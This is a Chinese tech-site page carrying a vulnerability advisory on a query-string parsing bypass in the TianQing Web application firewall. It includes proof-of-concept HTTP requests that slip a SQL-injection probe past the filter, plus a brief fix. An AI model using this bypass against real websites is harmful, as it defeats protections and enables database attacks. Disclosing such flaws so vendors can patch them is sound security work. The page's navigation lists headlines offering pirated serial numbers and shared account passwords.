- 1PS提示:因為圖層已鎖定,無法編輯圖層的處理方法
- 2picacg蘋果版怎么找不到|picacg ios版是不是下架了介紹
- 3Adobe Illustrator CS5 序列號大全
- 4ACDsee注冊碼免費分享(含ACDsee18、ACDsee10等版本)
- 5PDF瀏覽器能看3D文件嗎?PDF瀏覽器看3D文件圖文詳細教程
- 6Potato(馬鈴薯聊天)怎么注冊不了|Potato不能注冊處理方法介紹
- 7Potato(土豆聊天)怎么換頭像|Potato app更改頭像方法介紹
- 8最新的Adobe Illustrator CS4序列號大全
- 9qq郵件是否已讀怎么看 QQ郵箱已經發出去的郵件怎么知道對方是否已經查看
- 10Intel i7-9700K性能跑分曝光:同代提升約12%
- 11AMD推土機架構回顧:雖隕落卻是Zen成功的墊腳石
- 12美國增加25%進口關稅!PC硬件要大漲價
[摘要]啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。 Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &...
啟明星辰天清Web應用安全網關中存在協議解析繞過漏洞,該漏洞源于對http協議兼容未正確處理。攻擊者可利用該漏洞繞過WAF對于querystring的所有過濾,從而攻擊受保護的網站。
Servlet/2.5等jsp處理容器,能夠正確處理http協議GET /news.jsp?x= &id=16 HTTP/1.1中參數&id=16前面的空格獲取id=16這個參數,例如下數據包返回網頁正常:
GET /news.jsp?x= &id=16 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Connection: close
Host: www.test.com
Pragma: no-cache
與http://www.test.com/news.jsp?id=16返回網頁相同。
而啟明星辰天清Web應用安全網關解析協議時,會忽略GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1中"?x=空格"之后的參數,從而繞過防護。
例直接訪問:http://www.test.com/news.jsp?x=%20&id=16%20and%201=1會攔截
構造如下poc繞過:
GET /news.jsp?x= &id=16%20and%201=1 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: zh-CN
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)
Connection: close
Host: www.test.com
Pragma: no-cache
修復方案:
正確解析http請求第一行中 url參數帶空格字符后的參數
上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。
推薦資訊 總人氣榜
最新教程 本月人氣
- 1努比亞z11mini什么時候出 nubia z11mini上市時間
- 2努比亞z11mini價格多少錢 nubia z11mini報價
- 3努比亞z11mini設置如何 nubia z11mini參數設置
- 4華為p9與3星s7哪一個好 3星galaxy s7與華為p9比較評測
- 5華為p9與3星s6比較評測 3星galaxy s6與華為p9哪一個好
- 6華為p9與oppo r9plus哪一個好 oppo r9plus與華為p9比較評測
- 7華為p9與華為mate7哪一個好 華為mate7與華為p9比較評測
- 8華為榮耀暢玩5c與5x哪一個好 華為榮耀暢玩5x與5c比較評測
- 9魅族pro6如何打開VoLTE 魅族pro6設置VoLTE技巧方法流程
- 10小米5home鍵一側無反應 小米5home鍵按右側沒反應處理方法
- 11魅藍3與小米2s比較評測 小米2s好還是魅藍3好
- 12魅藍3與小米4c比較評測 小米4c與魅藍3哪一個好
- 1鬼怪大結局是什么?韓劇《鬼怪》大結局第16集視頻鏈接
- 2詳細說明MySQL5.7中的關鍵字與保留字
- 3聯想zuk z2開發者模式如何開 聯想zuk z2開發者模式打開圖文說明教程
- 4谷歌瀏覽器|谷歌瀏覽器屏蔽廣告圖文說明教程 谷歌瀏覽器如何屏蔽廣告
- 5用PS如何將照片背景換成藍色
- 6知道sql語句中where與having的區別
- 7mysql event事件調度器的圖文代碼詳細說明
- 8QQ影音如何截取QQ表情?QQ影音截取QQ表情圖文說明教程
- 9QQ影音如何播放3D視頻?QQ影音播放3D視頻設置技巧
- 10最新愛奇藝會員賬號密碼大全(2017.2.20)
- 113組騰訊視頻會員賬號共享(2017.2.20)
- 12QQ影音如何轉換視頻格式?
